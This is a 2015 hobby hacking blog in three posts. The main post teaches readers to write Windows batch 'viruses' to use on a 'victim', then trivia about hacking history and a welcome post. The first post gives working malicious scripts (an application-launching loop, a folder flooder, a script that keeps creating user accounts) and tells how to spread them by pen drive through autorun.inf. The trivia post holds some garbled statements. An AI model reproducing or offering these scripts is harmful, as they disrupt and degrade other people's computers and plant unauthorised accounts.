Sunday, April 12, 2015

Batch Files - the art of creating viruses


hackcenter
I could just you give the codes to paste in notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready. But instead of that, I have focused on making the basics of batch files clear and developing the approach to code your own viruses.

What are batch file?

Lets begin with a simple example , Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'

We first make a folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x' .
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat
Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it.
This means the three commands executed line by line when we ran the batch file

So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.

What can batch viruses do ?

They can be used to delete the windows files,format data,steal information,irritate victim, consume CPU resources to affect
performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.

Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (I am anything you wish but extension must be bat and save it as 'all files' instead of text files).



1.  Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x   //loop variable
start winword 
start mspaint  //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance. 

2. Folder flooder
@echo off
:x
md %random% // makes directory/folder. 
goto x

Here %random% is a variable that would generate a positive no. randomly.  So this code would make start creating folders whose name can be any random number. 

3.User account flooder 
@echo off
:x
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers. 

Spreading batch viruses through pen drive -:

Step 1. 
Open notepad and write 
[autorun]
open=anything.bat
Icon=anything.ico

Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.


Thursday, April 9, 2015

Things You Didn't Know About... Computer Hacking


hackcenter  Hi all reader i am back to the blog kcenterand in this blog i can tell u the amazing things about the computer hacking that u don't know or u are not aware by reading all this u get something new.
lets move what is hacking is :-

1. Hacker originally meant “one who makes furniture with an ax.” Perhaps because of the blunt nature of that approach, the word came to mean someone who takes pleasure in an unconventional solution to a technical obstacle.

2.  Computer hacking was born in the late 1950s, when members of Mit's tech Model Club, obsessed with electric switching, began preparing punch cards to control an IBM 704 mainframe.

3. One of the club’s early programs: code that illuminated lights on the mainframe’s console, making it look like a ball was zipping from left to right, then right to left with the flip of a switch. VoilĂ : computer Ping-Pong!

4. By the early 1970s, hacker "Cap'n Crunch" (a.k.a. John Draper) had used a toy whistle to match the 2,600-hertz tone used by AT&T’s long-distance switching system. This gave him access to call routing (and brief access to jail).

5. Before they struck it rich, Apple founderssteve  and Steve Jobs made and sold “blue boxes,” electronic versions of Draper’s whistle.

6. That same year, six Milwaukee teens hacked into Los Alamos National Lab, which develops nuclear weapons.

7. Think your Mac is hackproof? At this year’s CanSecWest conference, security researcher Charlie Miller used a flaw in Safari to break into a MacBook in under 10 seconds.

8. Cyborgs beware: Tadayoshi Kohno at the University of Washington recently hacked into a wireless defibrillator, causing it to deliver fatal-strength jolts of electricity.

Now u see the scope and the power of the hacking and it is not kid thing .
keep reading and sharing knowledge.
And Folow me an Google+

Also Check how to form Undeletable folder






Wednesday, April 8, 2015

Welcome Post

Heck Center HackCenter

Hello and warm welcome to all the new reader of the hackcenter.
hi this the first post from the hackcenter . I know u curiously want to know what is this is hackcenter? Some of u thinking that the it is a psyco hackers blog who shares his tricks ? Some of u also thinks that a auther is free ? Some one think while reading that the auther is a cs faculty?

So, guys i clear u all who i am why i made this blog. Myself Anmol Nijhawan and I am a computer science student. I am from India. I love to write code and to develop and to share and this blog is a way to share my experience , my knowledge with u all . I know that everyone wants to learn more and learning is increased by sharing and the life experiences also become memorable after sharing.

One of my mentor always ask me to guide the junior .One day i ask my mentor to why u always force me to guide or teach juniors as i am a coder i love to write codes than he told me that learning never ends dear and by spreading knowledge it always increase many folds.

In this way i inspire to write this blog . By start writing my interest field i.e coding is also done as i wrote all code in html and sharing my knowledge too and thanks to my sir to help me . In this u find the new tricks,coding techniques,cool hacks and human fav thing talks we also have interesting talks. 

Now come to the name why hackcenter? As this is the center for all those who want to learn the trick to safe the system ,your data and for little mischef but the auther is not responsible for any demage or any crime done by u.Always learn the hacking tricks for your benfits not to harm others okk.

This blog also help you all to safe your privacy , your confidentiality , and your system from your black hat hackers. Now u think that what are black hat hacker these are the peaple who use there knowledge to exploit other or to theft the things . Help to safe u from all type of cyber crimes .

hacker is someone who seeks and exploits weaknesses in a computer system . Hackers may be motivated by a multitude of reasons, such as profit, protest, challenge or enjoyment. The subculture that has evolved around hackers is often referred to as the computer underground and is now a known community.while other uses of the word hacker exist that are related to computer security, such as referring to someone with an advanced understanding of computers and computer networks,[3] they are rarely used in mainstream context. They are subject to the longstanding  about the term's true meaning. In this controversy, the term hacker is reclaimed by computer science who argue that someone who breaks into computers, whether computer criminal (black hat) or computer security expert (white hat), is more appropriately called a cracker instead.Some white hat hackers claim that they also deserve the title hacker, and that only black hats should be called "crackers".

There are many type of hackers :-
Black Hat hackers, White Hat hackers,Grey Hat hackers,Script Kiddi.

I am not the any one of them i am just the coder feel safe.

And What u all think about the girl hacker Comment on this Lets see what u think about the lady hackers I am waiting for your comments Readers.

I am not the hacker i learn the tricks to safe my self from all these hacks like password bypass and data disclosure etc.

This blog is full of entertainment ,knowledge . Stay connected and always read this as it is a good habbit too and reading build up your creativity and imagination too.

Follow me on Google+ and it is a good social site too.